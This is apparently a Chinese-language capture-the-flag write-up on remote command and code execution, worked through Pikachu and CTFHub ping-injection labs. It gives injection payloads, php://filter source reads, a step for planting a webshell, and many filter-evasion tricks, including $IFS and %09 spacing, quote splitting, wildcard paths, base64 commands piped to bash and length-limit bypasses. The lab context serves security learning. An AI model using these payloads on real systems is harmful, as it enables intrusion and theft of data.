RCE远程命令/代码执行漏洞
RCE英文全称:remote command/code execute。分为远程命令执行ping和远程代码执行evel。 漏洞出现的原因:没有在输入口做输入处理。我们常见的路由器、防火墙、入侵检测等设备的web管理界面上,一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。
常用的管道符
pikachu(ping)
一个文本框,输入ip地址可以进行ping操作,查看源码,发现队输入的”ip“地址没有进行过滤
利用管道符就可以实现任意代码执行。
pikachu(echo)
这个也是一样的,只是后台的命令是echo,没有过滤的话任何内容都可以执行。
输入框中输入phpinfo();,执行结果如下图:
一般常用的命令执行语句有
system('ls'); (system('ls /'); )
system('cat flag'); (system('cat /flag'); )
-
127.0.0.1;cat 2160627659946.php | base64(ping 情况下,直接cat不出来时考虑是有特殊字符,base64编码一下)
RCE与文件包含
filter读源码:php://filter/read=convert.base64-encode/recource=index.php
ctfhub:?file=php://filter/resource=/flag
CTFHUB 命令注入
和pikachu的类似也是一个最简单的没有过滤的ping命令执行,试一下127.0.0.1;ls
可以看到有个奇怪的文件
但是尝试一下cat,没有输出,估计是有字符编码无法显示出来。
(其实这个时候右键看一下源码就看到flag了)
将文件内容base64编码后输出:127.0.0.1;cat xxxxx.php|base64
看到了一串base64编码内容,解码即可获得flag。
方法二
可以自己注入一个后门,然后蚁剑连接一下。
将一段脚本写入555.php:127.0.0.1&echo -e "">555.php
(一定要注意"$"前面的"")
ls可以看见这个文件,后面就是拿出菜刀了,略。
这个方法二也可以应用与下面几个存在过滤的情况下。
常见的过滤及绕过技巧
过滤cat
反斜杠 : 例如 ca\t flag.php
单(双)引号: 例如 ca''t flag.txt
$1:例如ca$1t flag.txt
拼接:例如 a=c;b=at;b flag.txt
-
通配符(? 或*):例如:ca? flag.txt
/???会去寻找 / 目录下的三个字符长度的文件,正常情况下会寻找到/bin,然后/?a会优先匹配到/bin/cat,就成功调用了cat命令,然后后面可以使用正常的通配符匹配所需读的文件,如flag.txt文件名长度为8,使用8个?’’,此命令就会读取所有长度为8的文件。
/???/?[a][t] ?''?''?''?''?''?''?''?'' -
读取文件的替代指令:more cat tac head tail less more
https://www.cnblogs.com/ur10ser/p/7624367.html
tac 从最后一行倒序显示内容,并将所有内容输出 more 根据窗口大小,一页一页的现实文件内容 less 和more类似,但其优点可以往前翻页,而且进行可以搜索字符 head 只显示头几行 tail 只显示最后几行 nl 类似于cat -n,显示时输出行号 tailf 类似于tail -f
选择一个方法,还是base64一下输出,之后解密一下就有flag了。
过滤空格:
${IFS}($IFS$9)($IFS):cat${IFS}flag.txt
<> (<) (>):cat<>flag.txt
{cat,flag}
-
%09 :cat%09flag.txt
(这种编码绕过的方式要在url框中输入,在题目中的文本框中输入无效)
其他绕过
反引号(内联执行):反引号和$()都可用来表示命令,被包含的字符串会被当做命令首先执行。
-
base64:base64( "cat test.php")=Y2F0IHRlc3QucGhw
//将base64解码后的命令通过管道符传递给bash echo "Y2F0IGZsYWcudHh0Cg==" | base64 -d | bash
两个结合起来
//反引号包含base64解码后的命令
`echo "Y2F0IGZsYWcudHh0Cg==" | base64 -d`
- "?>" 代替 ";" :在php中可以用?>来代替最后一个
(php遇到定界符关闭标志时,会自动在php语句之后加上一个分号)
长度限制过滤
-
>>:使用>>每次添加一部分命令到文件中,然后使用cat r | bash执行命令
echo -n "cmd1" >> r; echo -n "cmd2" >> r; cat r | bash -
\:使用换行执行和ls -t绕过长度限制
ls -t将文件按时间排序输出
sh命令可以从一个文件中读取命令来执行root@kali:~/桌面# echo "flag{hahaha}" > flag.txt root@kali:~/桌面# touch "ag" root@kali:~/桌面# touch "fl\\" root@kali:~/桌面# touch "t \\" root@kali:~/桌面# touch "ca\\" root@kali:~/桌面# ls -t 'ca\' 't \' 'fl\' ag flag root@kali:~/桌面# ls -t >a #将 ls -t 内容写入到a文件中 root@kali:~/桌面# sh a a: 1: a: not found flag{hahaha} a: 6: flag.txt: not found
运算符过滤
过滤"/" :用cd进入目录即可
过滤“;”,“|”,“||”,“&”
小结:CTFHUB 综合过滤:
%0a代替换行,%09代替TAB键(因为flag被过滤了,所以我们通过TAB来补全flag_is_here)
%5c代替\(用\来分隔开cat,因为cat也被过滤了)
127.0.0.1%0als%09*:tab键可以自动补齐后面的内容ls%09*可查看所有的文件
payload:ip=127.0.0.1%0Acd%09*_is_here%0Ac%27%27at%09*.php
参考资料:
https://blog.csdn.net/qq_43814486/article/details/90020139
https://www.icode9.com/content-4-812303.html
https://www.cnblogs.com/0yst3r-2046/p/12600073.html
https://blog.csdn.net/weixin_42373789/article/details/113451481
https://www.cnblogs.com/0yst3r-2046/p/12617703.html
https://blog.csdn.net/qq_44657899/article/details/107676580